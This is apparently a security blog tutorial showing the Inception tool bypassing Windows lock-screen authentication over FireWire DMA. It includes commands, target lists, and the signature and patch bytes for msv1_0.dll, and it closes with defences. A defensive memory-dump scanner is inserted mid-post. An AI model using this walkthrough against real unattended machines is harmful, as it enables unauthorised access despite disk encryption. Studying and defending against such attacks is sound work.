This brief note illustrates how simple it is to circumvent password-protected machines, even ones with encrypted hard drives and the latest patches, with a great little tool called Inception.

Inception is a useful tool if you’re doing close-quarters security testing, i.e. you have physical access to the target device; think of a laptop left in a coffee shop or on an employee’s desk at lunchtime and you’re on the right track.

Inception exploits a well-known PCI memory vulnerability by tricking the target machine into thinking a legitimate device is connecting to it. Once the target makes this assumption it enables DMA so that the connecting device can transfer data directly to and from memory; as you will see, this is a bad idea. The beauty of this exploit is that if the machine is powered on and the signature is found, it completely bypasses any hard-disk encryption (TPM, Bcrypt, TrueCrypt etc.)!

By enabling DMA, the target machine has given any connecting device full read/write access to its memory, and Inception exploits this by trawling through memory looking for known byte patterns, such as the code of the OS’s password-validation routines (msv1_0.dll on Windows, libpam on Linux, as the target list below shows). Once a pattern is found, Inception modifies that memory location, bypassing authentication and allowing the attacker unrestricted access to the device.

Let’s have a look.

Inception will tell you if you don’t have a device connected (or if it is a device it doesn’t recognise):

$ sudo incept -v

 _|  _|      _|    _|_|_|  _|_|_|_|  _|_|_|    _|_|_|  _|    _|_|    _|      _|
 _|  _|_|    _|  _|        _|        _|    _|    _|    _|  _|    _|  _|_|    _|
 _|  _|  _|  _|  _|        _|_|_|    _|_|_|      _|    _|  _|    _|  _|  _|  _|
 _|  _|    _|_|  _|        _|        _|          _|    _|  _|    _|  _|    _|_|
 _|  _|      _|    _|_|_|  _|_|_|_|  _|          _|    _|    _|_|    _|      _|

v.0.2.4 (C) Carsten Maartmann-Moe 2013
Download: http://breaknenter.org/projects/inception | Twitter: @breaknenter

[!] No FireWire devices detected on the bus
[!] Attack unsuccessful

Connecting a target machine like this:

[image: target machine sitting at its login screen]

will get you something like this:

$ sudo incept -v

 _|  _|      _|    _|_|_|  _|_|_|_|  _|_|_|    _|_|_|  _|    _|_|    _|      _|
 _|  _|_|    _|  _|        _|        _|    _|    _|    _|  _|    _|  _|_|    _|
 _|  _|  _|  _|  _|        _|_|_|    _|_|_|      _|    _|  _|    _|  _|  _|  _|
 _|  _|    _|_|  _|        _|        _|          _|    _|  _|    _|  _|    _|_|
 _|  _|      _|    _|_|_|  _|_|_|_|  _|          _|    _|    _|_|    _|      _|

v.0.2.4 (C) Carsten Maartmann-Moe 2013
Download: http://breaknenter.org/projects/inception | Twitter: @breaknenter

[*] FireWire devices on the bus (names may appear blank):
------------------------------------------------------------------------------------------------------
[1] Vendor (ID): MICROSOFT CORP. (0x50f2) | Product (ID):  (0x0)
------------------------------------------------------------------------------------------------------
[*] Only one device present, device auto-selected as target
[*] Selected device: MICROSOFT CORP.
[*] Available targets:
------------------------------------------------------------------------------------------------------
[1] Windows 8: msv1_0.dll MsvpPasswordValidate unlock/privilege escalation
[2] Windows 7: msv1_0.dll MsvpPasswordValidate unlock/privilege escalation
[3] Windows Vista: msv1_0.dll MsvpPasswordValidate unlock/privilege escalation
[4] Windows XP: msv1_0.dll MsvpPasswordValidate unlock/privilege escalation
[5] Mac OS X: DirectoryService/OpenDirectory unlock/privilege escalation
[6] Ubuntu: libpam unlock/privilege escalation
[7] Linux Mint: libpam unlock/privilege escalation
------------------------------------------------------------------------------------------------------
[?] Please select target (or enter 'q' to quit):

Select the appropriate target. As you can see, this vulnerability is present even in Windows 8; this is because it isn’t an OS issue but a fundamental problem with the SBP-2 protocol used by PCI devices.

In this case I’m attacking a Windows 7 machine. Once you kick Inception off it will start trawling through memory looking for the target signature; this can take a few minutes depending on the amount of memory and the speed of the machine.

[*] Selected target: Windows 7: msv1_0.dll MsvpPasswordValidate unlock/privilege escalation
[*] The target module contains the following signatures:
------------------------------------------------------------------------------------------------------
	Versions:	SP0, SP1
	Architectures:	x86, x64

		Offsets:	0x2a8, 0x2a1, 0x291, 0x321
		Signature:	0xc60f85________b8
		Patch:		0x909090909090
		Patch offset:	0x1

		Offsets:	0x926
		Signature:	0x83f8107513b0018b
		Patch:		0x83f8109090b0018b
		Patch offset:	0x0

		Offsets:	0x312
		Signature:	0x83f8100f8550940000b0018b
		Patch:		0x83f810909090909090b0018b
		Patch offset:	0x0
------------------------------------------------------------------------------------------------------
[*] Initializing bus and enabling SBP-2, please wait  1 seconds or press Ctrl+C
[*] DMA shields should be down by now. Attacking...

Note: Inception can only read the lower 4 GB of memory, but this is usually enough to get a bypass in. If the target has more than 4 GB of RAM installed, the code it needs to patch may be loaded above that range and not be visible to Inception.

If you’re lucky, though, after a few minutes you should get the success message:

[===================================>                               ] 2205 MiB ( 54%) {76e85c8efeff8bf88b4508}
[*] Signature found at 0x89e0e321 (in page # 564750)
[*] Data read back: 0x909090909090
[*] Write-back verified; patching successful
[*] BRRRRRRRAAAAAWWWWRWRRRMRMRMMRMRMMMMM!!!
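A defender-side check, added here and not part of Inception or this post: it takes the signature/patch table printed above and scans a memory image (for example an acquired RAM dump) for both the intact form and the NOP-patched form, so an examiner can tell whether the password-validation code was tampered with. The sample memory image is constructed for the demonstration.

```python
import re

# Signature table as Inception prints it for the Windows 7 msv1_0.dll target (copied
# from the output above). "__" is a wildcard byte in Inception's notation; the patch
# bytes overwrite the matched region starting at patch_offset.
SIGNATURES = [
    ("c60f85________b8", "909090909090", 1),
    ("83f8107513b0018b", "83f8109090b0018b", 0),
    ("83f8100f8550940000b0018b", "83f810909090909090b0018b", 0),
]

def _tokens(hex_str):
    """Split a hex string into 2-character byte tokens ('__' stays a wildcard)."""
    return [hex_str[i:i + 2] for i in range(0, len(hex_str), 2)]

def _regex(tokens):
    """Compile tokens into a bytes regex; '__' matches any single byte."""
    pat = b"".join(b"." if t == "__" else re.escape(bytes.fromhex(t)) for t in tokens)
    return re.compile(pat, re.DOTALL)

def patched_tokens(sig_hex, patch_hex, patch_offset):
    """Byte tokens the region holds after Inception's patch has been written over it."""
    toks = _tokens(sig_hex)
    for i, t in enumerate(_tokens(patch_hex)):
        toks[patch_offset + i] = t
    return toks

def scan(memory):
    """Return sorted [(offset, rule_index, state)]; state is 'intact' (original
    password-validation code present) or 'patched' (branch replaced by 0x90 NOPs)."""
    hits = []
    for idx, (sig, patch, off) in enumerate(SIGNATURES):
        for m in _regex(_tokens(sig)).finditer(memory):
            hits.append((m.start(), idx, "intact"))
        for m in _regex(patched_tokens(sig, patch, off)).finditer(memory):
            hits.append((m.start(), idx, "patched"))
    return sorted(hits)

# Constructed sample image: filler, an intact copy of rule 0 (wildcard bytes filled
# with arbitrary values), then a copy of rule 1 in its patched form.
SAMPLE = (
    b"\x00" * 16
    + bytes.fromhex("c60f85") + b"\x11\x22\x33\x44" + bytes.fromhex("b8")
    + b"\xcc" * 8
    + bytes.fromhex("83f8109090b0018b")
    + b"\x00" * 8
)

if __name__ == "__main__":
    for off, idx, state in scan(SAMPLE):
        print(f"rule {idx} at 0x{off:x}: {state}")
```

A 'patched' hit in a dump taken from a running machine is the artefact the success output above leaves behind; on a clean system only 'intact' hits should appear.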

Inception has successfully bypassed the Windows lock-screen authentication, so any password you type (even a blank one) will work!

[image: target machine logged in]

Note: This change is only temporary; it lives in memory, so a reboot restores the original code and the original password is required again.

If you want to protect yourself against this sort of attack, I suggest disabling all FireWire ports, blocking the SBP-2 driver (http://support.microsoft.com/kb/2516445), or shutting down your machine if you’re going to be away for more than 5 minutes; as shown above, simply locking the screen is no defence.

Inception is included in Kali Linux and is available from the CERT-FORENSICS repository for Fedora distributions. The Inception web site can be found here: http://www.breaknenter.org/projects/inception/

Enjoy.
